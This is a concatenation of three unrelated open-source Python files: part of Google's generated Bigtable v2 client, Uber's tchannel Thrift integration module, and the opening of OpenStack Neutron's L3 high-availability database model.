# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.bigtable.v2.Bigtable"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
BigtableClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def table_path(cls, project, instance, table):
"""Return a fully-qualified table string."""
return google.api_core.path_template.expand(
"projects/{project}/instances/{instance}/tables/{table}",
project=project,
instance=instance,
table=table,
)
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
):
"""Constructor.
Args:
transport (Union[~.BigtableGrpcTransport,
Callable[[~.Credentials, type], ~.BigtableGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = bigtable_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=bigtable_grpc_transport.BigtableGrpcTransport,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = bigtable_grpc_transport.BigtableGrpcTransport(
address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def read_rows(
self,
table_name,
app_profile_id=None,
rows=None,
filter_=None,
rows_limit=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Streams back the contents of all requested rows in key order, optionally
applying the same Reader filter to each. Depending on their size,
rows and cells may be broken up across multiple responses, but
atomicity of each row will still be preserved. See the
ReadRowsResponse documentation for details.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> for element in client.read_rows(table_name):
... # process element
... pass
Args:
table_name (str): The unique name of the table from which to read. Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
rows (Union[dict, ~google.cloud.bigtable_v2.types.RowSet]): The row keys and/or ranges to read. If not specified, reads from all rows.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.RowSet`
filter_ (Union[dict, ~google.cloud.bigtable_v2.types.RowFilter]): The filter to apply to the contents of the specified row(s). If unset,
reads the entirety of each row.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.RowFilter`
rows_limit (long): The read will terminate after committing to N rows' worth of results. The
default (zero) is to return all results.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
Iterable[~google.cloud.bigtable_v2.types.ReadRowsResponse].
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "read_rows" not in self._inner_api_calls:
self._inner_api_calls[
"read_rows"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.read_rows,
default_retry=self._method_configs["ReadRows"].retry,
default_timeout=self._method_configs["ReadRows"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.ReadRowsRequest(
table_name=table_name,
app_profile_id=app_profile_id,
rows=rows,
filter=filter_,
rows_limit=rows_limit,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["read_rows"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def sample_row_keys(
self,
table_name,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Returns a sample of row keys in the table. The returned row keys will
delimit contiguous sections of the table of approximately equal size,
which can be used to break up the data for distributed tasks like
mapreduces.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> for element in client.sample_row_keys(table_name):
... # process element
... pass
Args:
table_name (str): The unique name of the table from which to sample row keys. Values are
of the form ``projects/<project>/instances/<instance>/tables/<table>``.
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
Iterable[~google.cloud.bigtable_v2.types.SampleRowKeysResponse].
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "sample_row_keys" not in self._inner_api_calls:
self._inner_api_calls[
"sample_row_keys"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.sample_row_keys,
default_retry=self._method_configs["SampleRowKeys"].retry,
default_timeout=self._method_configs["SampleRowKeys"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.SampleRowKeysRequest(
table_name=table_name, app_profile_id=app_profile_id
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["sample_row_keys"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def mutate_row(
self,
table_name,
row_key,
mutations,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Mutates a row atomically. Cells already present in the row are left
unchanged unless explicitly changed by ``mutation``.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `row_key`:
>>> row_key = b''
>>>
>>> # TODO: Initialize `mutations`:
>>> mutations = []
>>>
>>> response = client.mutate_row(table_name, row_key, mutations)
Args:
table_name (str): The unique name of the table to which the mutation should be applied.
Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
row_key (bytes): The key of the row to which the mutation should be applied.
mutations (list[Union[dict, ~google.cloud.bigtable_v2.types.Mutation]]): Changes to be atomically applied to the specified row. Entries are applied
in order, meaning that earlier mutations can be masked by later ones.
Must contain at least one entry and at most 100000.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Mutation`
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.bigtable_v2.types.MutateRowResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "mutate_row" not in self._inner_api_calls:
self._inner_api_calls[
"mutate_row"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.mutate_row,
default_retry=self._method_configs["MutateRow"].retry,
default_timeout=self._method_configs["MutateRow"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.MutateRowRequest(
table_name=table_name,
row_key=row_key,
mutations=mutations,
app_profile_id=app_profile_id,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["mutate_row"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def mutate_rows(
self,
table_name,
entries,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Mutates multiple rows in a batch. Each individual row is mutated
atomically as in MutateRow, but the entire batch is not executed
atomically.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `entries`:
>>> entries = []
>>>
>>> for element in client.mutate_rows(table_name, entries):
... # process element
... pass
Args:
table_name (str): The unique name of the table to which the mutations should be applied.
entries (list[Union[dict, ~google.cloud.bigtable_v2.types.Entry]]): The row keys and corresponding mutations to be applied in bulk.
Each entry is applied as an atomic mutation, but the entries may be
applied in arbitrary order (even between entries for the same row).
At least one entry must be specified, and in total the entries can
contain at most 100000 mutations.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Entry`
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
Iterable[~google.cloud.bigtable_v2.types.MutateRowsResponse].
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "mutate_rows" not in self._inner_api_calls:
self._inner_api_calls[
"mutate_rows"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.mutate_rows,
default_retry=self._method_configs["MutateRows"].retry,
default_timeout=self._method_configs["MutateRows"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.MutateRowsRequest(
table_name=table_name, entries=entries, app_profile_id=app_profile_id
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["mutate_rows"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def check_and_mutate_row(
self,
table_name,
row_key,
app_profile_id=None,
predicate_filter=None,
true_mutations=None,
false_mutations=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Mutates a row atomically based on the output of a predicate Reader filter.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `row_key`:
>>> row_key = b''
>>>
>>> response = client.check_and_mutate_row(table_name, row_key)
Args:
table_name (str): The unique name of the table to which the conditional mutation should be
applied. Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
row_key (bytes): The key of the row to which the conditional mutation should be applied.
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
predicate_filter (Union[dict, ~google.cloud.bigtable_v2.types.RowFilter]): The filter to be applied to the contents of the specified row. Depending
on whether or not any results are yielded, either ``true_mutations`` or
``false_mutations`` will be executed. If unset, checks that the row
contains any values at all.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.RowFilter`
true_mutations (list[Union[dict, ~google.cloud.bigtable_v2.types.Mutation]]): Changes to be atomically applied to the specified row if
``predicate_filter`` yields at least one cell when applied to
``row_key``. Entries are applied in order, meaning that earlier
mutations can be masked by later ones. Must contain at least one entry
if ``false_mutations`` is empty, and at most 100000.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Mutation`
false_mutations (list[Union[dict, ~google.cloud.bigtable_v2.types.Mutation]]): Changes to be atomically applied to the specified row if
``predicate_filter`` does not yield any cells when applied to
``row_key``. Entries are applied in order, meaning that earlier
mutations can be masked by later ones. Must contain at least one entry
if ``true_mutations`` is empty, and at most 100000.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.Mutation`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.bigtable_v2.types.CheckAndMutateRowResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "check_and_mutate_row" not in self._inner_api_calls:
self._inner_api_calls[
"check_and_mutate_row"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.check_and_mutate_row,
default_retry=self._method_configs["CheckAndMutateRow"].retry,
default_timeout=self._method_configs["CheckAndMutateRow"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.CheckAndMutateRowRequest(
table_name=table_name,
row_key=row_key,
app_profile_id=app_profile_id,
predicate_filter=predicate_filter,
true_mutations=true_mutations,
false_mutations=false_mutations,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["check_and_mutate_row"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def read_modify_write_row(
self,
table_name,
row_key,
rules,
app_profile_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Modifies a row atomically on the server. The method reads the latest
existing timestamp and value from the specified columns and writes a new
entry based on pre-defined read/modify/write rules. The new value for the
timestamp is the greater of the existing timestamp or the current server
time. The method returns the new contents of all modified cells.
Example:
>>> from google.cloud import bigtable_v2
>>>
>>> client = bigtable_v2.BigtableClient()
>>>
>>> table_name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
>>>
>>> # TODO: Initialize `row_key`:
>>> row_key = b''
>>>
>>> # TODO: Initialize `rules`:
>>> rules = []
>>>
>>> response = client.read_modify_write_row(table_name, row_key, rules)
Args:
table_name (str): The unique name of the table to which the read/modify/write rules should
be applied. Values are of the form
``projects/<project>/instances/<instance>/tables/<table>``.
row_key (bytes): The key of the row to which the read/modify/write rules should be applied.
rules (list[Union[dict, ~google.cloud.bigtable_v2.types.ReadModifyWriteRule]]): Rules specifying how the specified row's contents are to be transformed
into writes. Entries are applied in order, meaning that earlier rules will
affect the results of later ones.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.bigtable_v2.types.ReadModifyWriteRule`
app_profile_id (str): This value specifies routing for replication. If not specified, the
"default" application profile will be used.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.bigtable_v2.types.ReadModifyWriteRowResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "read_modify_write_row" not in self._inner_api_calls:
self._inner_api_calls[
"read_modify_write_row"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.read_modify_write_row,
default_retry=self._method_configs["ReadModifyWriteRow"].retry,
default_timeout=self._method_configs["ReadModifyWriteRow"].timeout,
client_info=self._client_info,
)
request = bigtable_pb2.ReadModifyWriteRowRequest(
table_name=table_name,
row_key=row_key,
rules=rules,
app_profile_id=app_profile_id,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("table_name", table_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["read_modify_write_row"](
request, retry=retry, timeout=timeout, metadata=metadata
)
|
|
# Copyright (c) 2016 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, unicode_literals
import sys
import types
from functools import partial
import thriftrw
from tornado import gen
from tornado.util import raise_exc_info
from tchannel.status import OK, FAILED
from tchannel.errors import OneWayNotSupportedError
from tchannel.errors import ValueExpectedError
from tchannel.response import Response, response_from_mixed
from tchannel.serializer.thrift import ThriftRWSerializer
from .module import ThriftRequest
def load(path, service=None, hostport=None, module_name=None):
"""Loads the Thrift file at the specified path.
The file is compiled in-memory and a Python module containing the result
is returned. It may be used with ``TChannel.thrift``. For example,
.. code-block:: python
from tchannel import TChannel, thrift
# Load our server's interface definition.
donuts = thrift.load(path='donuts.thrift')
# We need to specify a service name or hostport because this is a
# downstream service we'll be calling.
coffee = thrift.load(path='coffee.thrift', service='coffee')
tchannel = TChannel('donuts')
@tchannel.thrift.register(donuts.DonutsService)
@tornado.gen.coroutine
def submitOrder(request):
args = request.body
if args.coffee:
yield tchannel.thrift(
coffee.CoffeeService.order(args.coffee)
)
# ...
The returned module contains, one top-level type for each struct, enum,
union, exeption, and service defined in the Thrift file. For each service,
the corresponding class contains a classmethod for each function defined
in that service that accepts the arguments for that function and returns a
``ThriftRequest`` capable of being sent via ``TChannel.thrift``.
For more information on what gets generated by ``load``, see `thriftrw
<http://thriftrw.readthedocs.org/en/latest/>`_.
Note that the ``path`` accepted by ``load`` must be either an absolute
path or a path relative to the *the current directory*. If you need to
refer to Thrift files relative to the Python module in which ``load`` was
called, use the ``__file__`` magic variable.
.. code-block:: python
# Given,
#
# foo/
# myservice.thrift
# bar/
# x.py
#
# Inside foo/bar/x.py,
path = os.path.join(
os.path.dirname(__file__), '../myservice.thrift'
)
The returned value is a valid Python module. You can install the module by
adding it to the ``sys.modules`` dictionary. This will allow importing
items from this module directly. You can use the ``__name__`` magic
variable to make the generated module a submodule of the current module.
For example,
.. code-block:: python
# foo/bar.py
import sys
from tchannel import thrift
donuts = = thrift.load('donuts.thrift')
sys.modules[__name__ + '.donuts'] = donuts
This installs the module generated for ``donuts.thrift`` as the module
``foo.bar.donuts``. Callers can then import items from that module
directly. For example,
.. code-block:: python
# foo/baz.py
from foo.bar.donuts import DonutsService, Order
def baz(tchannel):
return tchannel.thrift(
DonutsService.submitOrder(Order(..))
)
:param str service:
Name of the service that the Thrift file represents. This name will be
used to route requests through Hyperbahn.
:param str path:
Path to the Thrift file. If this is a relative path, it must be
relative to the current directory.
:param str hostport:
Clients can use this to specify the hostport at which the service can
be found. If omitted, TChannel will route the requests through known
peers. This value is ignored by servers.
:param str module_name:
Name used for the generated Python module. Defaults to the name of the
Thrift file.
"""
# TODO replace with more specific exceptions
# assert service, 'service is required'
# assert path, 'path is required'
# Backwards compatibility for callers passing in service name as first arg.
if not path.endswith('.thrift'):
service, path = path, service
module = thriftrw.load(path=path, name=module_name)
return TChannelThriftModule(service, module, hostport)
class TChannelThriftModule(types.ModuleType):
"""Wraps the ``thriftrw``-generated module.
Wraps service classes with ``Service`` and exposes everything else from
the module as-is.
"""
def __init__(self, service, module, hostport=None):
"""Initialize a TChannelThriftModule.
:param str service:
Name of the service this module represents. This name will be used
for routing over Hyperbahn.
:param module:
Module generated by ``thriftrw`` for a Thrift file.
:param str hostport:
This may be specified if the caller is a client and wants all
requests sent to a specific address.
"""
self.service = service
self.hostport = hostport
self._module = module
services = getattr(self._module, '__services__', None)
if services is None:
# thriftrw <1.0
services = getattr(self._module, 'services')
for service_cls in services:
name = service_cls.service_spec.name
setattr(self, name, Service(service_cls, self))
def __getattr__(self, name):
return getattr(self._module, name)
def __str__(self):
return 'TChannelThriftModule(%s, %s)' % (self.service, self._module)
__repr__ = __str__
class Service(object):
"""Wraps service classes generated by thriftrw.
Exposes all functions of the service.
"""
def __init__(self, cls, module):
self._module = module
self._cls = cls
self._spec = cls.service_spec
self._setup_functions(self._spec)
def _setup_functions(self, spec):
if spec.parent:
# Set up inherited functions first.
self._setup_functions(spec.parent)
for func_spec in spec.functions:
setattr(self, func_spec.name, Function(func_spec, self))
@property
def name(self):
"""Name of the Thrift service this object represents."""
return self._spec.name
def __str__(self):
return 'Service(%s)' % self.name
__repr__ = __str__
class Function(object):
"""Wraps a ServiceFunction generated by thriftrw.
Acts as a callable that will construct ThriftRequests.
"""
__slots__ = (
'spec', 'service', '_func', '_request_cls', '_response_cls'
)
def __init__(self, func_spec, service):
self.spec = func_spec
self.service = service
self._func = func_spec.surface
self._request_cls = self._func.request
self._response_cls = self._func.response
@property
def endpoint(self):
"""Endpoint name for this function."""
return '%s::%s' % (self.service.name, self._func.name)
@property
def oneway(self):
"""Whether this function is oneway."""
return self.spec.oneway
def __call__(self, *args, **kwargs):
if self.oneway:
raise OneWayNotSupportedError(
'TChannel+Thrift does not currently support oneway '
'procedures.'
)
if not (
self.service._module.hostport or
self.service._module.service
):
raise ValueError(
"No 'service' or 'hostport' provided to " +
str(self)
)
module = self.service._module
call_args = self._request_cls(*args, **kwargs)
return ThriftRWRequest(
module=module,
service=module.service,
endpoint=self.endpoint,
result_type=self._response_cls,
call_args=call_args,
hostport=module.hostport,
)
def __str__(self):
return 'Function(%s)' % self.endpoint
__repr__ = __str__
def register(dispatcher, service, handler=None, method=None):
"""
:param dispatcher:
RequestDispatcher against which the new endpoint will be registered.
:param Service service:
Service object representing the service whose endpoint is being
registered.
:param handler:
A function implementing the given Thrift function.
:param method:
If specified, name of the method being registered. Defaults to the
name of the ``handler`` function.
"""
def decorator(method, handler):
if not method:
method = handler.__name__
function = getattr(service, method, None)
assert function, (
'Service "%s" does not define method "%s"' % (service.name, method)
)
assert not function.oneway
dispatcher.register(
function.endpoint,
build_handler(function, handler),
ThriftRWSerializer(service._module, function._request_cls),
ThriftRWSerializer(service._module, function._response_cls),
)
return handler
if handler is None:
return partial(decorator, method)
else:
return decorator(method, handler)
def build_handler(function, handler):
# response_cls is a class that represents the response union for this
# function. It accepts one parameter for each exception defined on the
# method and another parameter 'success' for the result of the call. The
# success kwarg is absent if the function doesn't return anything.
response_cls = function._response_cls
response_spec = response_cls.type_spec
@gen.coroutine
def handle(request):
# kwargs for this function's response_cls constructor
response_kwargs = {}
status = OK
try:
response = yield gen.maybe_future(handler(request))
except Exception as e:
response = Response()
for exc_spec in response_spec.exception_specs:
# Each exc_spec is a thriftrw.spec.FieldSpec. The spec
# attribute on that is the TypeSpec for the Exception class
# and the surface on the TypeSpec is the exception class.
exc_cls = exc_spec.spec.surface
if isinstance(e, exc_cls):
status = FAILED
response_kwargs[exc_spec.name] = e
break
else:
raise_exc_info(sys.exc_info())
else:
response = response_from_mixed(response)
if response_spec.return_spec is not None:
assert response.body is not None, (
'Expected a value to be returned for %s, '
'but recieved None - only void procedures can '
'return None.' % function.endpoint
)
response_kwargs['success'] = response.body
response.status = status
response.body = response_cls(**response_kwargs)
raise gen.Return(response)
handle.__name__ = function.spec.name
return handle
class ThriftRWRequest(ThriftRequest):
def __init__(self, module, **kwargs):
kwargs['serializer'] = ThriftRWSerializer(
module, kwargs['result_type']
)
super(ThriftRWRequest, self).__init__(**kwargs)
def read_body(self, body):
response_spec = self.result_type.type_spec
for exc_spec in response_spec.exception_specs:
exc = getattr(body, exc_spec.name)
if exc is not None:
raise exc
# success - non-void
if response_spec.return_spec is not None:
if body.success is None:
raise ValueExpectedError(
'Expected a value to be returned for %s, '
'but recieved None - only void procedures can '
'return None.' % self.endpoint
)
return body.success
# success - void
else:
return None
|
|
# Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import netaddr
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_utils import excutils
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.db import agents_db
from neutron.db import l3_dvr_db
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import l3_ext_ha_mode as l3_ha
from neutron.i18n import _LI, _LW
from neutron.openstack.common import log as logging
VR_ID_RANGE = set(range(1, 255))
MAX_ALLOCATION_TRIES = 10
UNLIMITED_AGENTS_PER_ROUTER = 0
LOG = logging.getLogger(__name__)
L3_HA_OPTS = [
cfg.BoolOpt('l3_ha',
default=False,
help=_('Enable HA mode for virtual routers.')),
cfg.IntOpt('max_l3_agents_per_router',
default=3,
help=_('Maximum number of agents on which a router will be '
'scheduled.')),
cfg.IntOpt('min_l3_agents_per_router',
default=constants.MINIMUM_AGENTS_FOR_HA,
help=_('Minimum number of agents on which a router will be '
'scheduled.')),
cfg.StrOpt('l3_ha_net_cidr',
default='169.254.192.0/18',
help=_('Subnet used for the l3 HA admin network.')),
]
cfg.CONF.register_opts(L3_HA_OPTS)
class L3HARouterAgentPortBinding(model_base.BASEV2):
"""Represent agent binding state of a HA router port.
A HA Router has one HA port per agent on which it is spawned.
This binding table stores which port is used for a HA router by a
L3 agent.
"""
__tablename__ = 'ha_router_agent_port_bindings'
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete='CASCADE'),
nullable=False, primary_key=True)
port = orm.relationship(models_v2.Port)
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id',
ondelete='CASCADE'),
nullable=False)
l3_agent_id = sa.Column(sa.String(36),
sa.ForeignKey("agents.id",
ondelete='CASCADE'))
agent = orm.relationship(agents_db.Agent)
